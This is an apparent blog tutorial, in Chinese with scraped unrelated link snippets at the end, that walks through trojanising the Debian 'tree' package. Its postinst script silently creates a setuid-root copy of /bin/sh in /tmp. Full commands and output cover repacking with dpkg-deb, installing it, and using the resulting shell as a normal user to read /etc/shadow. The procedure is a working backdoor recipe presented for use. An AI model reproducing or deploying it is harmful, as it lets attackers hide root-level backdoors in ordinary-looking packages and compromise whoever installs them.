create a backdoor deb package
|
以下介绍怎样制作包括后门的deb安装包。以tree为例进行说明。利用apt-get下载安装包。--download-only表示仅仅下载不做其它处理。 |
|
root@deb:~#apt-get download --download-only tree Get:1Downloading tree 1.6.0-1 [43.3 kB] Fetched43.3 kB in 2s (21.4 kB/s) root@deb:~#ls -l total44 -rw-r--r--1 root root 43314 Feb 4 2012 tree_1.6.0-1_amd64.deb |
|
解压deb安装包,并创建文件夹DEBIAN(大写),在DEBIAN文件夹下创建文件control和postinst。 |
|
Control。包括deb包说明信息,比如:包名,版本。平台。作者等。 [EN]:http://www.debian.org/doc/manuals/debian-faq/ch-pkg_basics.en.html [CN]:http://www.debian.org/doc/manuals/debian-faq/ch-pkg_basics.zh-cn.html |
|
Postinst。完毕Debian包文件解包文件的配置工作。通常,“postinst”脚本等待用户输入,或提醒用户。假设他接受当前默认值。要记得软件包安装完后返回又一次配置。很多“postinst”脚本负责运行有关命令为新安装或升级的软件重新启动服务。 |
|
root@deb:~#dpkg -x tree_1.6.0-1_amd64.deb tree_1.6.0-1_amd64 root@deb:~#mkdir ./tree_1.6.0-1_amd64/DEBIAN root@deb:~#cd ./tree_1.6.0-1_amd64/DEBIAN/ root@deb:~/tree_1.6.0-1_amd64/DEBIAN#touch control postinst |
|
Control内容,可来源于dpkg–info |
|
root@deb:~/tree_1.6.0-1_amd64/DEBIAN#dpkg --info /root/tree_1.6.0-1_amd64.deb newdebian package, version 2.0. size43314 bytes: control archive=664 bytes. 393bytes, 12 lines control 433bytes, 7 lines md5sums Package:tree Version:1.6.0-1 Architecture:amd64 Maintainer:Florian Ernst <florian@debian.org> Installed-Size:109 Depends:libc6 (>= 2.3) Section:utils Priority:optional Homepage:http://mama.indstate.edu/users/ice/tree/ Description:displays directory tree, in color Displaysan indented directory tree, using the same color assignments as ls,via the LS_COLORS environment variable. |
|
终于control文件内容例如以下: |
|
root@deb:~/tree_1.6.0-1_amd64/DEBIAN#cat control Package:tree Version:1.6.0-1 Architecture:amd64 Maintainer:Florian Ernst <florian@debian.org> Installed-Size:109 Depends:libc6 (>= 2.3) Section:utils Priority:optional Homepage:http://mama.indstate.edu/users/ice/tree/ Description:displays directory tree, in color Displays an indented directorytree, using the same color assignments as ls, via the LS_COLORSenvironment |
|
终于postinst脚本内容例如以下: |
|
root@deb:~/tree_1.6.0-1_amd64/DEBIAN#cat postinst #!/bin/bash sudo cp /bin/sh /tmp/rootshell && sudo chown root:root/tmp/rootshell && sudo chmod 4755 /tmp/rootshell root@deb:~/tree_1.6.0-1_amd64/DEBIAN#chmod 755 postinst |
|
全部配置文件准备完毕后。使用dpkg-deb打包,成功创建包括后门的安装包tree_1.6.0-1_amd64.deb. |
|
root@deb:~/tree_1.6.0-1_amd64/DEBIAN#ls -l /root/ total4 drwxr-xr-x4 root root 4096 Aug 26 06:17 tree_1.6.0-1_amd64 root@deb:~/tree_1.6.0-1_amd64/DEBIAN#dpkg-deb --build /root/tree_1.6.0-1_amd64/ dpkg-deb:building package `tree' in `/root/tree_1.6.0-1_amd64.deb'. root@deb:~/tree_1.6.0-1_amd64/DEBIAN#ls -l /root/ total48 drwxr-xr-x4 root root 4096 Aug 26 06:17 tree_1.6.0-1_amd64 -rw-r--r--1 root root 43156 Aug 26 06:28 tree_1.6.0-1_amd64.deb |
|
安装后门deb包,创建/tmp/rootshell文件. |
|
root@deb:~/tree_1.6.0-1_amd64/DEBIAN#ls -l /tmp/ total20 drwx------2 docker docker 4096 Aug 26 05:15 pulse-bmNZfTJ6gWCq drwx------2 root root 4096 Aug 26 05:14 pulse-PKdhtXMmr18n drwx------2 Debian-gdm Debian-gdm 4096 Aug 26 05:15 pulse-ZvmMH2Gn4QZR drwx------2 docker docker 4096 Aug 26 05:15 ssh-qkrUkg0Dfu9v drwxr-xr-x2 docker docker 4096 Aug 26 05:15 tracker-docker root@deb:~/tree_1.6.0-1_amd64/DEBIAN#dpkg -i /root/tree_1.6.0-1_amd64.deb Selectingpreviously unselected package tree. (Readingdatabase ... 130311 files and directories currently installed.) Unpackingtree (from /root/tree_1.6.0-1_amd64.deb) ... Settingup tree (1.6.0-1) ... Processingtriggers for man-db ... root@deb:~/tree_1.6.0-1_amd64/DEBIAN#ls -l /tmp/ total128 drwx------2 docker docker 4096 Aug 26 05:15 pulse-bmNZfTJ6gWCq drwx------2 root root 4096 Aug 26 05:14 pulse-PKdhtXMmr18n drwx------2 Debian-gdm Debian-gdm 4096 Aug 26 05:15 pulse-ZvmMH2Gn4QZR -rwsr-xr-x1 root root 106920 Aug 26 06:29 rootshell drwx------2 docker docker 4096 Aug 26 05:15 ssh-qkrUkg0Dfu9v drwxr-xr-x2 docker docker 4096 Aug 26 05:15 tracker-docker |
|
执行后门 |
|
docker@deb:/root/tree_1.6.0-1_amd64/DEBIAN$/tmp/rootshell #id uid=1000(docker)gid=1000(docker) euid=0(root)groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),105(scanner),110(bluetooth),112(netdev),1000(docker) #head -1 /etc/shadow root:$6$GiCLTee$AEFGgQdvK2LG3m7gtD6.HG39rIrkhh48P..234Xs3DFuxUJ/B7jfJO5mJryPCRmeW1sGHvgf6GT77ztJ.PHO31:16302:0:99999:7::: # |
參考链接:
http://pastebin.com/m5XULth7#
http://www.offensive-security.com/metasploit-unleashed/Binary_Linux_Trojan
create a backdoor deb package的更多相关文章
- AX7: CREATE AN AUTOMATED TEST PACKAGE\MODEL
AX7: CREATE AN AUTOMATED TEST PACKAGE\MODEL It’s really important for a stable solution the use of a ...
- ROS学习手记 - 2.1: Create and Build ROS Package 生成包(Python)
ROS学习手记 - 2.1: Create and Build ROS Package 生成包(Python) 时隔1年,再回来总结这个问题,因为它是ros+python开发中,太常用的一个操作,需要 ...
- Quickstart: Create and publish a package using Visual Studio (.NET Framework, Windows)
https://docs.microsoft.com/en-us/nuget/quickstart/create-and-publish-a-package-using-visual-studio-n ...
- create a nodejs npm package
1. create a folder named m1 2. run command: npm init, this will create the package.json file 3. crea ...
- make deb for debian/ubuntu, package software for debian/ubuntu
here you may find useful information: =====================X8---------------------------------8X==== ...
- deb包的安装及dpkg命令小结
DPKG commands There are two actions, they are dpkg-query and dpkg-deb. Install a package # sudo dpkg ...
- Ubuntu Linux: How Do I install .deb Packages?
Ubuntu Linux: How Do I install .deb Packages? Ubuntu Linux: How Do I install .deb Packages? by Nix C ...
- 【Ubuntu 16】DEB软件包管理
一.背景介绍 开源软件最早的时候没有软件包和软件包管理器,用户只能下载源码包自行配置 编译 安装. 后来linux各发行版本推出了软件包格式和软件包管理程序 Red Hat.Centos使用RPM格式 ...
- ubuntu deb pacakge 开发
安装构建工具 apt-get install pbuilder 推荐安装 sudo apt-get install build-essential autoconf automake \ autoto ...
随机推荐
- IO Streams:字节流
简介 程序使用字节流来执行8位字节的输入和输出.所有字节流类都继承于InputStream和OutputStream. 有很多字节流类:为了说明字节流如何工作,我们将重点关注文件I / O字节流Fil ...
- 九度oj 题目1475:IP数据包解析
题目描述: 我们都学习过计算机网络,知道网络层IP协议数据包的头部格式如下: 其中IHL表示IP头的长度,单位是4字节:总长表示整个数据包的长度,单位是1字节. 传输层的TCP协议数据段的头部格式如下 ...
- 刷题总结——Human Gene Functions(hdu1080)
题目: Problem Description It is well known that a human gene can be considered as a sequence, consisti ...
- bzoj1306: [CQOI2009]match循环赛(模拟爆搜)
Input第一行包含一个正整数n,队伍的个数.第二行包含n个非负整数,即每支队伍的得分.Output输出仅一行,即可能的分数表数目.保证至少存在一个可能的分数表.Sample Input 6 5 6 ...
- jenkins配置本机JDK和maven环境
1.jenkins官网下下载jenkins的war包 2.安装jenkins,启动命令:java -jar jenkins.war 3.打开http://localhost:8080/ 4.点击系统 ...
- linux环境内存分配原理 mallocinfo【转】
转自:http://www.cnblogs.com/dongzhiquan/p/5621906.html Linux的虚拟内存管理有几个关键概念: Linux 虚拟地址空间如何分布?malloc和fr ...
- llinux 定时器 转载自 http://blog.chinaunix.net/uid-11848011-id-96374.html
这篇文章主要记录我在试图解决如何尽可能精确地在某个特定的时间间隔执行某项具体任务时的思路历程,并在后期对相关的API进行的归纳和总结,以备参考. 问题引出 很多时候,我们会有类似“每隔多长时间执行某项 ...
- pycharm提示your evalluation license has expired解决方法
安装pycharm,一段时间后提示your evalluation license has expired:打开pycharm--点击help--register--选中license server, ...
- npm 查看模块全部版本
npm 查看模块全部版本:(jquery) npm view jquery versions 安装指定版本: (jquery) npm install jquery@1.7.2
- Understanding Linux CPU Load - when should you be worried?
http://blog.scoutapp.com/articles/2009/07/31/understanding-load-averages